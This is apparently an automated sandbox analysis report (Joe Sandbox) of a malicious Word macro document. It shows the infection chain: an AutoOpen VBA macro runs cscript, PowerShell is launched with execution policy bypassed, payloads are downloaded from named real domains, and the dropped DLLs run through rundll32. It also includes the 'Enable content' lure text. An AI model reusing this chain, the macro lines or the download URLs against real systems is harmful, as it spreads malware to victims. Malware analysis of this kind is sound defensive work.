Windows Analysis Report sample.doc.vir

Overview

General Information

Sample Name: sample.doc.vir (renamed file extension from vir to doc)
Analysis ID: 528758
MD5: 6be56f977b6692fb6ce5f94e110664e3
SHA1: f4d5ce35c656e0f156a2ced453a964faabef09fb
SHA256: ae94cd20505f914bba5e612acb80c429c5606a739c0838e3a5f87bfcc7cc8519
Tags: docxvir

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected MalDoc
Multi AV Scanner detection for submitted file
Sigma detected: Office product drops script at suspicious location
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for domain / URL
Yara detected Powershell download and execute
Document contains an embedded VBA with many string operations indicating source code obfuscation
Document contains an embedded VBA macro which may execute processes
Document contains OLE streams with names of living off the land binaries
Sigma detected: Change PowerShell Policies to a Unsecure Level
Document contains an embedded VBA with base64 encoded strings
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded macro with GUI obfuscation
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Document has an unknown application name
May sleep (evasive loops) to hinder dynamic analysis
Internet Provider seen in connection with other malware
Stores large binary data to the registry
Document contains an embedded VBA macro which executes code when the document is opened / closed
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Uses insecure TLS / SSL version for HTTPS connection
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Document contains no OLE stream with summary information
Potential document exploit detected (unknown TCP traffic)
Contains functionality to detect virtual machines (SLDT)
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 684 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • cscript.exe (PID: 344 cmdline: "C:\Windows\System32\cscript.exe" C:\Users\user\AppData\Roaming\www.txt //E:VBScript //NoLogo %~f0 %* MD5: ECB021CA3370582F0C7244B0CF06732C)
      • powershell.exe (PID: 2676 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & C:\Users\user\AppData\Roaming\www.ps1 MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • cmd.exe (PID: 2204 cmdline: "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www1.dll,ldr MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • rundll32.exe (PID: 2236 cmdline: rundll32.exe C:\ProgramData\www1.dll,ldr MD5: DD81D91FF3B0763C392422865C9AC12E)
      • cmd.exe (PID: 2560 cmdline: "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www2.dll,ldr MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • rundll32.exe (PID: 2076 cmdline: rundll32.exe C:\ProgramData\www2.dll,ldr MD5: DD81D91FF3B0763C392422865C9AC12E)
      • cmd.exe (PID: 2640 cmdline: "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www3.dll,ldr MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • rundll32.exe (PID: 1612 cmdline: rundll32.exe C:\ProgramData\www3.dll,ldr MD5: DD81D91FF3B0763C392422865C9AC12E)
      • cmd.exe (PID: 2012 cmdline: "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www4.dll,ldr MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • rundll32.exe (PID: 2988 cmdline: rundll32.exe C:\ProgramData\www4.dll,ldr MD5: DD81D91FF3B0763C392422865C9AC12E)
      • cmd.exe (PID: 940 cmdline: "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www5.dll,ldr MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • rundll32.exe (PID: 2648 cmdline: rundll32.exe C:\ProgramData\www5.dll,ldr MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
sample.doc.doc | Office_AutoOpen_Macro | Detects an Microsoft Office file that contains the AutoOpen Macro function | Florian Roth | 0x1dece:$s1: AutoOpen; 0x1f200:$s1: AutoOpen; 0x16100:$s2: Macros
sample.doc.doc | JoeSecurity_MalDoc | Yara detected MalDoc | Joe Security |
sample.doc.doc | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |

Dropped Files

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\www.ps1 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
C:\Users\user\AppData\Local\Temp\~DF26415DDA42946BBE.TMP | JoeSecurity_MalDoc | Yara detected MalDoc | Joe Security |
C:\Users\user\AppData\Local\Temp\~DF26415DDA42946BBE.TMP | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{C9C61CB4-AA54-4D1D-A472-514E047583D2}.tmp | JoeSecurity_MalDoc | Yara detected MalDoc | Joe Security |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{C9C61CB4-AA54-4D1D-A472-514E047583D2}.tmp | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |

Sigma Overview

System Summary:

Sigma detected: Change PowerShell Policies to a Unsecure Level
Source: Process started, Author: frack113, Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & C:\Users\user\AppData\Roaming\www.ps1, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & C:\Users\user\AppData\Roaming\www.ps1, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cscript.exe" C:\Users\user\AppData\Roaming\www.txt //E:VBScript //NoLogo %~f0 %*, ParentImage: C:\Windows\System32\cscript.exe, ParentProcessId: 344, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & C:\Users\user\AppData\Roaming\www.ps1, ProcessId: 2676

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started, Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team, Data: Command: "C:\Windows\System32\cscript.exe" C:\Users\user\AppData\Roaming\www.txt //E:VBScript //NoLogo %~f0 %*, CommandLine: "C:\Windows\System32\cscript.exe" C:\Users\user\AppData\Roaming\www.txt //E:VBScript //NoLogo %~f0 %*, CommandLine|base64offset|contains: h.(, Image: C:\Windows\System32\cscript.exe, NewProcessName: C:\Windows\System32\cscript.exe, OriginalFileName: C:\Windows\System32\cscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 684, ProcessCommandLine: "C:\Windows\System32\cscript.exe" C:\Users\user\AppData\Roaming\www.txt //E:VBScript //NoLogo %~f0 %*, ProcessId: 344

Sigma detected: Non Interactive PowerShell
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & C:\Users\user\AppData\Roaming\www.ps1, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & C:\Users\user\AppData\Roaming\www.ps1, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cscript.exe" C:\Users\user\AppData\Roaming\www.txt //E:VBScript //NoLogo %~f0 %*, ParentImage: C:\Windows\System32\cscript.exe, ParentProcessId: 344, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & C:\Users\user\AppData\Roaming\www.ps1, ProcessId: 2676

Data Obfuscation:

Sigma detected: Office product drops script at suspicious location
Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 684, TargetFilename: C:\Users\user\AppData\Roaming\www.ps1

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: sample.doc.doc, Virustotal: Detection: 50%
Source: sample.doc.doc, ReversingLabs: Detection: 60%

Antivirus / Scanner detection for submitted sample
Source: sample.doc.doc, Avira: detected

Multi AV Scanner detection for domain / URL
Source: ghapan.com, Virustotal: Detection: 8%
Source: yoowi.net, Virustotal: Detection: 8%
Source: chaturanga.groopy.com, Virustotal: Detection: 8%
Source: gruasingenieria.pe, Virustotal: Detection: 7%

Source: unknown, HTTPS traffic detected: 136.243.74.161:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: unknown, HTTPS traffic detected: 192.185.17.114:443 -> 192.168.2.22:49169 version: TLS 1.0
Source: unknown, HTTPS traffic detected: 210.211.111.87:443 -> 192.168.2.22:49170 version: TLS 1.0
Source: unknown, HTTPS traffic detected: 143.95.80.83:443 -> 192.168.2.22:49171 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Process created: C:\Windows\System32\cscript.exe
Source: global traffic, DNS query: name: ghapan.com
Source: global traffic, TCP traffic: 192.168.2.22:49167 -> 136.243.74.161:443

Networking:

Yara detected MalDoc
Source: Yara match, File source: sample.doc.doc, type: SAMPLE
Source: Yara match, File source: C:\Users\user\AppData\Local\Temp\~DF26415DDA42946BBE.TMP, type: DROPPED
Source: Yara match, File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{C9C61CB4-AA54-4D1D-A472-514E047583D2}.tmp, type: DROPPED
Source: Yara match, File source: C:\Users\user\AppData\Local\Temp\~DF77272A7F6F18B150.TMP, type: DROPPED

Source: Joe Sandbox View, ASN Name: HETZNER-ASDE
Source: Joe Sandbox View, ASN Name: ASMALLORANGE1US
Source: Joe Sandbox View, JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: global traffic, HTTP traffic detected: GET /Kdg73onC3oQ/090921.html HTTP/1.1 Host: ghapan.com Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Host: ghapan.com
Source: global traffic, HTTP traffic detected: GET /LUS1NTVui6/090921.html HTTP/1.1 Host: gruasingenieria.pe Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /tDzEJ8uVGwdj/130921.html HTTP/1.1 Host: yoowi.net Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /7SEZBnhMLW/130921.html HTTP/1.1 Host: chaturanga.groopy.com Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Host: chaturanga.groopy.com
Source: Joe Sandbox View, IP Address: 136.243.74.161
Source: Joe Sandbox View, IP Address: 143.95.80.83
Source: Joe Sandbox View, IP Address: 192.185.17.114
Source: Joe Sandbox View, IP Address: 210.211.111.87
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 25 Nov 2021 17:39:46 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Tue, 23 Apr 2019 06:20:01 GMT Accept-Ranges: bytes Content-Length: 746 Vary: Accept-Encoding Content-Type: text/html
                Source: powershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmpString found in binary or memory: https://yoowi.net/tDzEJ8uVGwdj/1
                Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmpString found in binary or memory: https://yoowi.net/tDzEJ8uVGwdj/130921.html
                Source: powershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmpString found in binary or memory: https://yoowi.net/tDzEJ8uVGwdj/130921.htmlPE
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{CEA04FE6-8D47-46DE-880E-C9FDF00950BC}.tmp
                Source: unknown DNS traffic detected: queries for: ghapan.com
                Source: global traffic HTTP traffic detected: GET /Kdg73onC3oQ/090921.html HTTP/1.1 Host: ghapan.com Connection: Keep-Alive
                Source: global traffic HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Host: ghapan.com
                Source: global traffic HTTP traffic detected: GET /LUS1NTVui6/090921.html HTTP/1.1 Host: gruasingenieria.pe Connection: Keep-Alive
                Source: global traffic HTTP traffic detected: GET /tDzEJ8uVGwdj/130921.html HTTP/1.1 Host: yoowi.net Connection: Keep-Alive
                Source: global traffic HTTP traffic detected: GET /7SEZBnhMLW/130921.html HTTP/1.1 Host: chaturanga.groopy.com Connection: Keep-Alive
                Source: global traffic HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Host: chaturanga.groopy.com

                System Summary:

                Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
                Source: Screenshot number: 4 Screenshot OCR: Enable editing" button on the top bar, and then click "Enable content" 0 Page, I of I Words
                Source: Screenshot number: 4 Screenshot OCR: Enable content" 0 Page, I of I Words: 0 N@m 13 ;a 10096 G) FI G) ,, . I lm=lk E ' 0
                Source: Screenshot number: 8 Screenshot OCR: Enable content" Ru 71)11 qllnn|| n$m RunDLL m" RunDLL ,0 There was a problem starting C:\Progr
                Source: Document image extraction number: 0 Screenshot OCR: Enable editing" button on the top bar, and then click "Enable content"
                Source: Document image extraction number: 0 Screenshot OCR: Enable content"
                Source: Document image extraction number: 1 Screenshot OCR: Enable editing" button on the top bar, and then click "Enable content"
                Source: Document image extraction number: 1 Screenshot OCR: Enable content"
                Source: Screenshot number: 12 Screenshot OCR: Enable editing" button on the top bar, and then click "Enable content" RunDLL |~| ,:Q, There was
                Source: Screenshot number: 12 Screenshot OCR: Enable content" RunDLL |~| ,:Q, There was a problem starting C:\ProgramOata\www1.dll " C:\Program
                Document contains an embedded VBA macro which may execute processes
                Source: sample.doc.doc OLE, VBA macro line: h11.Run "cscript.exe %appdata%\www.txt //E:VBScript //NoLogo " + "%~f0" + " %*", Chr(48)
                Source: VBA code instrumentation OLE, VBA macro: Module Module3, Function eFile, API IWshShell3.Run("cscript.exe %appdata%\www.txt //E:VBScript //NoLogo %~f0 %*","0") Name: eFile
                Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: JbxHook_Run_2__ob = jbxthis.Run(jbxparam0, jbxparam1)
                Document contains OLE streams with names of living off the land binaries
                Source: sample.doc.doc Stream path 'Macros/deutsche/o'
                Source: ~DF77272A7F6F18B150.TMP.0.dr Stream path 'deutsche/o'
                Source: ~DF26415DDA42946BBE.TMP.0.dr Stream path 'o'
                Document contains an embedded VBA with base64 encoded strings
                Source: VBA code instrumentation OLE, VBA macro: Module Module3, Function eFile, String ZZZZZZZZZZZZZZZZZZZZZZZZZZZZ
                Document contains an embedded VBA macro with suspicious strings
                Source: sample.doc.doc OLE, VBA macro line: RO = Environ("USERPROFILE") & "\AppData\Roaming\"
                Source: VBA code instrumentation OLE, VBA macro: Module Module3, Function eFile, String environ: RO = Environ("USERPROFILE") & "\AppData\Roaming\" Name: eFile
                Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: Private Function JbxHook_Environ_1_(jbxline, ByRef jbxparam0)
                Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: Static jbxtresh_Environ As Integer
                Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: If jbxtresh_Environ < 200 Then
                Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: JbxLog "api:" & jbxline & ":Environ"
                Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: JbxHook_Environ_1_ = Environ(jbxparam0)
                Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: If jbxtresh_Environ < 200 Then
                Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: jbxtresh_Environ = jbxtresh_Environ + 1
                Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Environ_1_
                Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: RO = JbxHook_Environ_1_(20, "USERPROFILE") & "\AppData\Roaming\"
                Document contains an embedded macro with GUI obfuscation
                Source: sample.doc.doc Stream path 'Macros/deutsche/o' : Found suspicious string wscript.shell in non macro stream
                Source: sample.doc.doc, type: SAMPLE Matched rule: Office_AutoOpen_Macro date = 2015-05-28, hash5 = 7c06cab49b9332962625b16f15708345, hash4 = a3035716fe9173703941876c2bde9d98, hash3 = 66e67c2d84af85a569a04042141164e6, hash2 = 63f6b20cb39630b13c14823874bd3743, author = Florian Roth, description = Detects an Microsoft Office file that contains the AutoOpen Macro function, hash7 = 25285b8fe2c41bd54079c92c1b761381, hash6 = bfc30332b7b91572bfe712b656ea8a0c, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 4d00695d5011427efc33c9722c61ced2
                Source: ~WRF{C9C61CB4-AA54-4D1D-A472-514E047583D2}.tmp.0.dr OLE indicator application name: unknown
                Source: ~DFE56B344EF3200177.TMP.0.dr OLE indicator application name: unknown
                Source: ~DF77272A7F6F18B150.TMP.0.dr OLE indicator application name: unknown
                Source: ~DF26415DDA42946BBE.TMP.0.dr OLE indicator application name: unknown
                Source: sample.doc.doc OLE, VBA macro line: Sub AutoOpen()
                Source: VBA code instrumentation OLE, VBA macro: Module ThisDocument, Function AutoOpen Name: AutoOpen
                Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: Private Function JbxHook_Open_1__ob(jbxline, ByRef jbxthis, ByRef jbxparam0)
                Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: Static jbxtresh_Open As Integer
                Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: If jbxtresh_Open < 200 Then
                Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: JbxHook_Open_1__ob = jbxthis.Open(jbxparam0)
                Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: If jbxtresh_Open < 200 Then
                Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: jbxtresh_Open = jbxtresh_Open + 1
                Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Open_1__ob
                Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: Private Function JbxHook_Open_4__ob(jbxline, ByRef jbxthis, ByRef jbxparam0, ByRef jbxparam1, ByRef jbxparam2, ByRef jbxparam3)
                Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: Static jbxtresh_Open As Integer
                Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: If jbxtresh_Open < 200 Then
                Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: JbxHook_Open_4__ob = jbxthis.Open(jbxparam0, jbxparam1, jbxparam2, jbxparam3)
                Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: If jbxtresh_Open < 200 Then
                Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: jbxtresh_Open = jbxtresh_Open + 1
                Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Open_4__ob
                Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: JbxHook_Open_1__ob 9, con, "Provider=SQLOLEDB.1;Integrated Security=SSPI;Persist Security Info=False;Initial Catalog=LIBRARY;Data Source=PALEN\SQLPALENSERVER"
                Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: JbxHook_Open_4__ob 21, rs, "select * from dbo.Tbl_BOOK where dbo.Tbl_BOOK.Call_no= " & "'" & frmTrans1.DataGrid4.Columns.Item(0).Text & "'", con, adOpenStatic, adLockOptimistic
                Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: JbxHook_Open_4__ob 31, rs, "select * from dbo.Tbl_STUDENTS", con, adOpenStatic, adLockOptimistic
                Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: JbxHook_Open_4__ob 38, rs, "Select * from Tbl_STUDENTS " & "where ID = '" & frmTrans1.txtSea.Text & "'", con, adOpenStatic, adLockOptimistic
                Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: JbxHook_Open_4__ob 42, rs, "Select * from dbo.Tbl_STUDENTS " & "where Lastname = '" & frmTrans1.txtSea.Text & "'", con, adOpenStatic, adLockOptimistic
                Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: JbxHook_Open_4__ob 46, rs, "Select * from dbo.Tbl_STUDENTS " & "where Course = '" & frmTrans1.txtSea.Text & "'", con, adOpenStatic, adLockOptimistic
                Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: JbxHook_Open_4__ob 56, rs, "Select * from Tbl_BOOK " & "where Call_no = '" & frmTrans1.txtSBook & "'", con, adOpenStatic, adLockOptimistic
                Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: JbxHook_Open_4__ob 60, rs, "Select * from dbo.Tbl_BOOK " & "where Title = '" & frmTrans1.txtSBook.Text & "'", con, adOpenStatic, adLockOptimistic
                Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: JbxHook_Open_4__ob 70, rs, "Select * from dbo.Tbl_STUDENTS where dbo.Tbl_STUDENTS.ID= " & "'" & frmTrans1.DataGrid1.Columns.Item(0).Text & "'", con, adOpenStatic, adLockOptimistic
                Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: JbxHook_Open_4__ob 80, rs, "select *from Tbl_Transaction where ID ='" & frmTrans1.txtID.Text & "'", con, adOpenStatic, adLockOptimistic
                Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: JbxHook_Open_4__ob 93, rs, "select * from dbo.Tbl_BOOK", con, adOpenStatic, adLockOptimistic
                Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: JbxHook_Open_4__ob 115, rs, "Select * from dbo.Tbl_TRANSACTION where dbo.Tbl_TRANSACTION.Call_no= " & "'" & frmTrans1.Datagrid3.Columns.Item(0).Text & "'", con, adOpenStatic, adLockOptimistic
                Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: JbxHook_Open_4__ob 125, rs, "select * from dbo.Tbl_TRANSACTION where dbo.Tbl_TRANSACTION.ID='" & frmTrans1.Datagrid3.Columns.Item(3).Text & "'", con, adOpenStatic, adLockOptimistic
                Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: Private Function JbxHook_Open_1__ob_set(jbxline, ByRef jbxthis, ByRef jbxparam0)
                Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: Static jbxtresh_Open As Integer
                Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: If jbxtresh_Open < 200 Then
                Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: Set JbxHook_Open_1__ob_set = jbxthis.Open(jbxparam0)
                Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: If jbxtresh_Open < 200 Then
                Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: jbxtresh_Open = jbxtresh_Open + 1
                Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Open_1__ob_set
                Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: Sub AutoOpen()
                Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: Set docNow = JbxHook_Open_1__ob_set(31, Documents, .SelectedItems(lr))
                Source: ~WRF{C9C61CB4-AA54-4D1D-A472-514E047583D2}.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                Source: ~DFE56B344EF3200177.TMP.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                Source: ~DF77272A7F6F18B150.TMP.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                Source: ~DF26415DDA42946BBE.TMP.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                Source: ~WRF{C9C61CB4-AA54-4D1D-A472-514E047583D2}.tmp.0.dr OLE indicator has summary info: false
                Source: ~DFE56B344EF3200177.TMP.0.dr OLE indicator has summary info: false
                Source: ~DF77272A7F6F18B150.TMP.0.dr OLE indicator has summary info: false
                Source: ~DF26415DDA42946BBE.TMP.0.dr OLE indicator has summary info: false
                Source: sample.doc.doc OLE indicator, VBA macros: true
                Source: ~DF77272A7F6F18B150.TMP.0.dr OLE indicator, VBA macros: true
                Source: sample.doc.doc Virustotal: Detection: 50%
                Source: sample.doc.doc ReversingLabs: Detection: 60%
                Source: C:\Windows\System32\cscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................0.......#.................4.....0.........4......./.....`I1........v.....................K8.....................................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#................/.k......................n.............}..v............0...............H>U.............................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../.......n.e.d. .a.n. .e.r.r.o.r.:. .(.4.0.4.). .N.o.t. .F.o.u.n.d..."...0................=U.....>.......................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../................/.k......................n.............}..v............0...............H>U.............................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.0.n.............}..v....(.......0................=U.....".......................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ...ot be resolved: 'lotolands.com'"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: At line:1 char:40
                Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\cscript.exe "C:\Windows\System32\cscript.exe" C:\Users\user\AppData\Roaming\www.txt //E:VBScript //NoLogo %~f0 %*
                Source: C:\Windows\System32\cscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & C:\Users\user\AppData\Roaming\www.ps1
                Source: C:\Windows\System32\cscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www1.dll,ldr
                Source: C:\Windows\System32\cscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www2.dll,ldr
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www1.dll,ldr
                Source: C:\Windows\System32\cscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www3.dll,ldr
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www2.dll,ldr
                Source: C:\Windows\System32\cscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www4.dll,ldr
